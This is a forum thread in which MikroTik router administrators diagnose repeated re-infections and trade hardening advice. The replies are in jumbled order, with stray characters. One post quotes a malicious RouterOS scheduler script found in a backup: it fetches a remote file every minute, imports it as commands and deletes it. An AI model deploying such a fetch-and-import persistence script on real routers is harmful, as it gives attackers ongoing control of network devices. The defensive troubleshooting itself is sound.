Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset.
Other manufacturers are already selling devices with default password printed on a sticker, not derived from MAC address or serial number. Well this has to be changed by MikroTik anyway, as it will be forbidden to sell devices in the EU from 2024 in the state as it is now (standard default password). So admin: no password to local network are not safe anymore.
There are information about windows malware, that knows how to connect to MT router with default password and make a configuration changes to add it to botnet. If you say you already handled a couple of routers and they get re-infected, start over with a couple and put very close monitoring on those devices to see when and how it happens again.Ī freshly installed router with proper firewall and proper admin access can normally not be hacked. If possible, allow (temporarily) only MAC management access to such router using one of the eth ports. Do not reuse anything which comes from an internal source.ĭo not have these newly installed routers make management connection to internal resources (only traffic, obviously). Not even your backups !ĭownload ALL packages needed for reinstall new, if possible do so from a device not on your network.
This can only mean (I think) one way or the other the malicious code is already inside AND is somehow being used to re-infect those routers.ĭon't trust a thing.
Very strange story and probably we are not getting the full context here. So IF he effectively net-installed an infected one, deploy 6.47/6.48/6.49 on it, create strong usernames/password and lockdown services and it STILL gets infected ?! Others will surely chime in with alternative (better) suggestions. You could use a script to have them mailed to you periodically.įactory reset that router and start again.ĭo NOT import any settings/scripts from the old environment without having seen every single line. Obviously someone is able to get in one way or the other so investigate those logs and firewall settings carefully.Ĭonnect WAN again and regularly investigate logs for admin/VPN access. review your firewall (enable logging for all possible open ports until you identify the open door) change password of admin user (better: make new user with admin rights and REMOVE default admin user) review your logs for admin and VPN access review any other script/auto-setting/whatever still available in Files Block all external access to that device (pull the WAN cable out, sorry for that but it's needed) It does look like someone has had (still has ?) access to your device. We have tried to download this file "command.scr", when we run it's only html file. Tool fetch url= :delay 10 /import file-n\Īme=command.scr :delay 30 /file remove command.scr"Īdd interval=1m name=fetch1m on-event=fetch policy=\įtp,reboot,read,write,policy,test,password,sniff,sensitive,romon \ We have also do weekly backup to ftpĭuring the checking from one of our router backup, we found this scriptĪdd dont-require-permissions=no name=fetch owner=god policy=\įtp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\ We are blocking the access using /ip/services, with non standard port and certain IP only to access the router.
If we are outside of office, we need to do L2tp before we can login to the router. We have disable the access to router only from certain ip (office). export hide-sensitive file=anynameyouwish Which kind of VPN are you using for this access?